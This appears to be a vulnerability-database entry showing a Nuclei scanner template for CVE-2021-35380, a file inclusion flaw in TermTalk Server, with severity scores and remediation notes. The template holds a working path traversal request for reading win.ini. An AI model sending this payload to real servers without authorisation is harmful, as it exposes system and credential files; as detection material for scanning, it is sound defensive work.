nuclei ProjectDiscovery NUCLEI:CVE-2021-35380
Sep 03, 2022 - 6:19 a.m.

TermTalk Server 3.24.0.2 - Local File Inclusion

2022-09-03 06:19:17
ProjectDiscovery
github.com
cve2021, termtalk, lfi, unauthenticated, exploit-db, solari

CVSS2: 5 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.452 Medium
Percentile: 97.4%

TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion, which allows an unauthenticated malicious user to gain access to files on the remote system by providing the relative path of the file they want to retrieve.

id: CVE-2021-35380

info:
  name: TermTalk Server 3.24.0.2 - Local File Inclusion
  author: fxploit
  severity: high
  description: |
    TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server.
  reference:
    - https://www.swascan.com/solari-di-udine/
    - https://www.exploit-db.com/exploits/50638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
    - https://www.swascan.com/it/security-blog/
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-35380
    cwe-id: CWE-22
    epss-score: 0.45222
    epss-percentile: 0.97404
    cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: solari
    product: termtalk_server
  tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari

http:
  - method: GET
    path:
      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a004830460221009072fe1d0473fca0a0eec04089db37692674bb003d19077f1abe104a7de5f13e022100ca18722c70eaec2a2d9498923f1f2b1688a806fbcc4e6d16d2a20629e772d968:922c64590222798bb761d5b6d8e72950
